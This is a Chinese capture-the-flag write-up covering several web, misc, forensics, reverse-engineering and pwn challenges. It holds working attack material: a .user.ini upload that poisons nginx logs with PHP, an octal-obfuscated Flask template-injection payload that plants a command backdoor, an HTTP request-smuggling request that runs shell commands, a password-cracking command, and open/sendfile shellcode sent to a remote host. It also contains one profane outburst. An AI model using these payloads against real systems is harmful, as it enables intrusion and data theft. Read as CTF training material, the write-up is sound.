_0x2a9f09: 0x276
}
, _0x28ad78 = {
_0x5cc3bd: 0xd7,
_0x17ef46: 0x1a2,
_0x53dab6: 0x129
}
, _0x36a7b3 = {
_0x2f2c5a: 0xe9,
_0x101124: 0x10b
}
, _0x8bd32d = {
'BmCfZ': function(_0x571dda, _0x15b43b) {
return _0x571dda(_0x15b43b);
},
'rjCiw': 'rqxvweqty,' + _0x2f5b69(_0x11e4ba._0x54ce81, 0x86, _0x11e4ba._0x3f05fd, _0x11e4ba._0x3c12d8) + 'of\x20it'
}
, _0x12c806 = _0xf4e5c(_0x11e4ba._0x4f7709, _0x11e4ba._0x4097be, 0x258, 0x25a) + _0xf4e5c(0x261, 0x252, 0x282, _0x11e4ba._0x26b0f8) + 'e';
function _0xf4e5c(_0x5cdb5f, _0x1bf623, _0x4be90e, _0x2b1dd6) {
return _0x43b95d(_0x5cdb5f - _0x36a7b3._0x2f2c5a, _0x1bf623, _0x4be90e - _0x36a7b3._0x101124, _0x2b1dd6 - _0x36a7b3._0x2f2c5a);
}
_0x8bd32d[_0x2f5b69(_0x11e4ba._0x34a3a3, _0x11e4ba._0x67fb88, _0x11e4ba._0x4337fa, _0x11e4ba._0x2d8f19)](confirm, _0x12c806);
function _0x2f5b69(_0xfde3ce, _0x57f13f, _0x4cdb67, _0x13e691) {
return _0x43b95d(_0x57f13f - -_0x28ad78._0x5cc3bd, _0x13e691, _0x4cdb67 - _0x28ad78._0x17ef46, _0x13e691 - _0x28ad78._0x53dab6);
}
_0x8bd32d[_0xf4e5c(_0x11e4ba._0x16ffa7, _0x11e4ba._0x29c7a0, _0x11e4ba._0x4fd058, _0x11e4ba._0x1eed2e)](confirm, _0x8bd32d['rjCiw']),
_0x8bd32d[_0xf4e5c(_0x11e4ba._0x3d8cce, _0x11e4ba._0x135008, _0x11e4ba._0x1548b1, _0x11e4ba._0x1aa760)](confirm, _0xf4e5c(_0x11e4ba._0x229bf7, 0x23d, _0x11e4ba._0xe6db95, _0x11e4ba._0x3aa31e) + _0x2f5b69(0xcd, 0xb3, _0x11e4ba._0x3c19c3, _0x11e4ba._0x52b346) + _0xf4e5c(_0x11e4ba._0x48ed1f, _0x11e4ba._0x5d4762, _0x11e4ba._0x3c9e76, _0x11e4ba._0x2a9f09));
}
;

https://obf-io.deobfuscate.io/

1

访问/rqxvweqtyfshbs.php

奶龙牌图片处理器2.0

nginx直接上传.user.ini

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST / HTTP/1.1
Host: 175.27.251.122:33165
Upgrade-Insecure-Requests: 1
Origin: http://175.27.251.122:33165
Referer: http://175.27.251.122:33165/
Cookie: JSESSIONID=node0jmgnupaoej9r7mqglbiahyzu4.node0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoIjdcuXv5OADAN7I
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36;<?php phpinfo();?>
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 366

------WebKitFormBoundaryoIjdcuXv5OADAN7I
Content-Disposition: form-data; name="upload_file"; filename=".user.ini"
Content-Type: application/octet-stream

auto_append_file=/var/log/nginx/access.log
------WebKitFormBoundaryoIjdcuXv5OADAN7I--

1

重新开个靶机上传木马即可

Try2Crossover

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
from flask import Flask, render_template, request, redirect, url_for, render_template_string, abort

app = Flask(__name__)


books = [
{"id": 1, "title": "the great gatsby", "author": "F. Scott Fitzgerald"},
{"id": 2, "title": "to kill a lockingbird", "author": "Harper Lee"},
{"id": 3, "title": "1984", "author": "George Orwell"}
]


def waf(code):
blacklist = ["waf", "before", "after", "error", "teardown", "context", "appcontext",
">", "<", "|", "stack", "top", "join", "count", "\\x", "original","request"]
if any(pattern in code for pattern in blacklist):
abort(403)

original_code = waf.__code__
original_name = waf.__name__

@app.route('/')
def index():
return render_template('index.html', books=books)


@app.route('/add_book', methods=['POST'])
def add_book():
title = request.form.get('title')
author = request.form.get('author')
waf(title)
waf(author)

book_id = len(books) + 1
books.append({"id": book_id, "title": title, "author": author})

return redirect(url_for('index'))


@app.route('/edit_book/<int:book_id>', methods=['GET', 'POST'])
def edit_book(book_id):
book = next((b for b in books if b["id"] == book_id), None)

if request.method == 'POST':
book["title"] = request.form.get('title')
book["author"] = request.form.get('author')
waf(book['title'])
waf(book['author'])

return redirect(url_for('index'))

return render_template('edit_book.html', book=book)


@app.route('/details/<int:id>', methods=['GET', 'POST'])
def details(id):
book = next((b for b in books if b["id"] == id), None)
book_author = book.get("author")
waf(book_author)

tem = """
<head>
<title>Book Details</title>
</head>
<body>
<h1>Book Details</h1>
<p>ID: {{ book.id }}</p>
<p>Title: {{ book.title|capitalize_title }}</p>
<p>No other info.</p>
</body>
</html>"""
render_template_string(book_author)
if waf.__code__ != original_code or waf.__name__ != original_name:
abort(403)
return render_template_string(tem, book_author=book_author, book=book, )


@app.route('/forbidden',methods=['GET', 'POST'])
def forbidden():
return "forbidden!!!"


@app.template_filter('capitalize_title')
def capitalize_title(title):
return ' '.join(word.capitalize() for word in title.split())


@app.route("/admin", methods=['GET', 'POST'])
def admin():
username = request.form.get('username')

return f"Username: {username}\n"

if __name__ == '__main__':
app.run(host="0.0.0.0", port=5000)


本来不想动脑的,稍微看了一下好像八进制可以绕过,我之前蜀道山出的那道题目预期也是如此,现在只需要将payload优化即可

1
{{url_for["\137\137\147\154\157\142\141\154\163\137\137"]["\137\137\142\165\151\154\164\151\156\163\137\137"]["\145\166\141\154"]("\141\160\160.\141\146\164\145\162\137\162\145\161\165\145\163\164\137\146\165\156\143\163.\163\145\164\144\145\146\141\165\154\164(None, []).\141\160\160\145\156\144(lambda \162\145\163\160: \103\155\144\122\145\163\160 if \162\145\161\165\145\163\164.\141\162\147\163.\147\145\164('\143\155\144') and \145\170\145\143(\"\147\154\157\142\141\154 \103\155\144\122\145\163\160;\103\155\144\122\145\163\160=\137\137\151\155\160\157\162\164\137\137('\146\154\141\163\153').\155\141\153\145\137\162\145\163\160\157\156\163\145(\137\137\151\155\160\157\162\164\137\137('\157\163').\160\157\160\145\156(\162\145\161\165\145\163\164.\141\162\147\163.\147\145\164('\143\155\144')).\162\145\141\144())\")==None else \162\145\163\160)", {"\162\145\161\165\145\163\164":url_for["\137\137\147\154\157\142\141\154\163\137\137"]["\162\145\161\165\145\163\164"],"\141\160\160":url_for["\137\137\147\154\157\142\141\154\163\137\137"]["current_app"]})}}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from flask import Flask, request, render_template_string, abort

app = Flask(__name__)

blacklist = ["waf", "before", "after", "error", "teardown", "context", "appcontext",
">", "<", "|", "stack", "top", "join", "count", "\\x", "original", "request"]


def waf_check(input_str):
matched = []
for pattern in blacklist:
if pattern.lower() in input_str.lower():
matched.append(pattern)
return matched


@app.route('/')
def hello_world():
name = request.args.get('name', 'bao')

matches = waf_check(name)
if matches:
print(f"[WAF Blocked] 匹配到黑名单内容: {matches}")
abort(403)

template = f'<h1>Hi, {name}.</h1>'
return render_template_string(template)


if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)

本地测试了一下,肯定是绕过了的,但是远程不知道为什么没通,后面看到hint说有中间件作为反代,需要进行请求走私

1
2
3
4
5
6
7
8
GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxxGET /other HTTP/1.1
Host: example.com

网上给的是这种,那这题就是这样的

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /admin HTTP/1.1
Host: 175.27.251.122:10001
Content-Type: application/x-www-form-urlencoded
Content-Length: 388
Sec-Websocket-Key1: x

usernamePOST /add_book HTTP/1.1
Host: 175.27.251.122:10001
Content-Length: 284
Content-Type: application/x-www-form-urlencoded
Connection: close

title=test&author={{get_flashed_messages["\137\137\147\154\157\142\141\154\163\137\137"]["\137\137\142\165\151\154\164\151\156\163\137\137"]['\137\137\151\155\160\157\162\164\137\137']('os').popen('sleep 5').read()}}

1

不知道为什么,用yakit做不了,把flag写到静态目录,

1
2
mkdir static;ls />static/3.txt
mkdir static;cat f*>static/3.txt

傻逼环境我测你妈

small_challenge

1

binwalk -e 1.png,有两个图,先双图合并试试

1

https://zxing.org/w/decode.jspx 解密,解密结果放到随波逐流里

1
UV!W_X_YZ,U,Y∈[0,9], V,W,X,Z∈[A,z]

直接掩码爆破

1
2
3
zip2john flag.zip >zip1.txt

john --mask='?d[A-Za-z]![A-Za-z]_[A-Za-z]_?d[A-Za-z]' zip1.txt --format=pkzip --fork=4

1

就是压缩包密码

数学天才

试炼一和试练二两个一起看解压葵花宝典

试炼一:斜下对角线的数字,是打开葵花宝典的密钥。
试炼二:为师不想要死,为师喜欢$。

经过分析得知

1

1

得到密码295$25$23,随波得到

1
2
3
4
synt{E3@1_Z@gu_t3avh5!}

# 有好几个有意义的挨着交
flag{R3@1_M@th_g3niu5!}

001

1
2
3
4
5
6
7
已知 6 位嫌疑人的手机号分别是:
135****2345
138****7383
153****9888
155****7991
157****0947
170****5678

找出和170****5678通话,微信图片_20250519152440.png和微信图片_20250519152452.png,其中全是该嫌疑人通话,

1

1

慢慢找,找出是flag{133****0181}

002

1

135****2345开头的嫌疑人进行了部分排查,写个脚本进行处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
import pandas as pd
from collections import defaultdict
import sys


def find_common_contacts(target_numbers, call_records_df):
"""
找出与所有给定电话号码都有过通话记录的电话号码

参数:
target_numbers (list): 需要查找的电话号码列表
call_records_df (DataFrame): 包含通话记录的DataFrame

返回:
set: 与所有给定号码都有通话记录的电话号码集合
"""
# 为每个目标电话号码创建联系人集合
contacts = defaultdict(set)

# 处理每一行通话记录
for _, row in call_records_df.iterrows():
caller = row['本机号码']
receiver = row['对方号码']

# 记录通话关系
if caller in target_numbers:
contacts[caller].add(receiver)
if receiver in target_numbers:
contacts[receiver].add(caller)

# 检查是否所有目标号码都有联系人
if len(contacts) < len(target_numbers):
missing_numbers = set(target_numbers) - set(contacts.keys())
print(f"警告: 以下号码在通话记录中未找到: {', '.join(missing_numbers)}")

# 找出所有目标号码的联系人集合
all_contacts = [contacts.get(num, set()) for num in target_numbers if num in contacts]

# 找出所有集合的交集
if not all_contacts:
return set()

common_contacts = set.intersection(*all_contacts)

# 确保目标号码不包含在结果中
return common_contacts - set(target_numbers)


def main():
# 给定的电话号码列表
target_numbers = [
'135****2345',
'138****7383',
'153****9888',
'155****7991',
'157****0947',
'170****5678'
]

# 从Excel文件读取数据
try:
# 获取文件名(允许从命令行参数指定)
file_name = sys.argv[1] if len(sys.argv) > 1 else '工作簿2.xlsx'
sheet_name = sys.argv[2] if len(sys.argv) > 2 else 'Sheet1'

print(f"正在从 {file_name}{sheet_name} 表中读取数据...")

# 读取Excel文件
call_records_df = pd.read_excel(file_name, sheet_name=sheet_name)

# 检查列名是否正确
required_columns = ['本机号码', '对方号码']
missing_columns = [col for col in required_columns if col not in call_records_df.columns]
if missing_columns:
print(f"错误:Excel文件中缺少以下列: {', '.join(missing_columns)}")
return

# 数据预处理
print(f"原始数据包含 {len(call_records_df)} 条记录")

# 确保号码格式一致(转为字符串)
call_records_df['本机号码'] = call_records_df['本机号码'].astype(str)
call_records_df['对方号码'] = call_records_df['对方号码'].astype(str)

# 去除重复记录
call_records_df = call_records_df.drop_duplicates(subset=['本机号码', '对方号码'])
print(f"去重后包含 {len(call_records_df)} 条记录")

# 调用函数查找共同联系人
common_numbers = find_common_contacts(target_numbers, call_records_df)

# 打印结果
print(f"\n与所有给定电话号码都有通话记录的电话号码: {len(common_numbers)} 个")
if common_numbers:
for num in sorted(common_numbers):
print(num)
else:
print("没有找到共同联系人")

# 将结果保存到新的Excel文件
output_file = '共同联系人结果.xlsx'
result_df = pd.DataFrame({'共同联系人': list(common_numbers)})
result_df.to_excel(output_file, index=False)
print(f"\n结果已保存到 '{output_file}'")

except FileNotFoundError:
print(f"错误:找不到文件 '{file_name}'")
except Exception as e:
print(f"发生错误: {str(e)}")


if __name__ == "__main__":
main()

得到flag{158****6074}

004

138****7383把这个号码的所有都提取出来,有448个,把时间锁定

1

类似的挨着找出来即可

1
flag{130****9357-137****5632-139****2928-183****5333}

qrd

flag格式为part1/part2,打开part1,发现是进行了某些加密,丢给gpt分析

image-20250524175423699

梭哈解密脚本,得到第一段flag

1
2
3
4
5
6
7
8
9
10
11
12
13
# 已知的加密部分
encrypted = [88, 47, 80, 54, 95, 57, 90, 54, 94, 47]

# 对应的异或密钥(交替使用)
keys = [0x31, 0x58]

# 解密逻辑
decrypted = ''.join(chr(byte ^ keys[i % 2]) for i, byte in enumerate(encrypted))

# 输出结果
print("Decrypted flag:", decrypted)

# Decrypted flag: iwannaknow

第二段看图标可以知道是python打包的exe,常规反编译即可,用在线网站反编译后发现还需要一个decrypt函数

image-20250524175713874

在pyz打包的目录中找到secret.pyc,反编译得到decrypt函数

image-20250524175750635

丢给gpt写脚本即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
def key_schedule(key: bytes) -> list:
S = list(range(128))
v6 = 0
for j in range(128):
v6 = (S[j] + key[j % len(key)] + v6) % 128
v6 = (v6 ^ 55) % 128
S[j], S[v6] = (S[v6], S[j])
return S


def next_byte(state: dict) -> int:
S = state['S']
state['i'] = (state['i'] + 1) % 128
state['j'] = (state['j'] + S[state['i']]) % 128
S[state['i']], S[state['j']] = (S[state['j']], S[state['i']])
v2 = S[(S[state['i']] + S[state['j']]) % 128]
return (16 * v2 | v2 >> 4) & 255


def decrypt(ciphertext: bytes, key: bytes) -> bytes:
state = {'S': key_schedule(key), 'i': 0, 'j': 0}
plaintext = bytearray()
for byte in ciphertext:
plaintext.append(byte ^ next_byte(state))
return bytes(plaintext)


# key 和 ciphertext 来自 WO0o.py
key = bytes.fromhex(
'EC3700DFCD4F364EC54B19C5E7E26DEF6A25087C4FCDF4F8507A40A9019E3B48BD70129D0141A5B8F089F280F4BE6CCD')
ciphertext = b'\xd4z\'0L\x10\xca\x0b\x0b\xaa\x15\xbeK0"\xbf\xb2\xc6\x05'

# 解密得到 flag
flag = decrypt(ciphertext, key)
print(flag.decode())

# what_DO_you_mean#@!

拼接即为flag

小馋猫

题目开启沙箱

image-20250524164221697

限制了一堆函数,但是可以使用open和sendfile函数

程序逻辑限制只能有一次syscall

image-20250524164325746

并且清空了常见的寄存器,可以从xmm0寄存器中mov到rdi一个地址

恢复栈,然后调用一次open,之后布置好参数,jmp短跳转到上一次syscall,执行第二次sendfile的系统调用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pwn import*
context(arch='amd64',log_level='debug')
# p=process("./pwn")

p=remote("175.27.229.115",7470)
p.recvuntil(":")


shellcode=asm('''
movq rdi, xmm0
mov rsp,rdi
mov rax, 2
mov rdi, 0x67616c662f2e
push rdi
mov rdi, rsp
nop
syscall
mov rsi,rax
mov rax,40
mov rdi,1
mov r10,0x100
''')
p.sendline(b'a'*0x30+shellcode+b'\xeb\xe3')
p.interactive()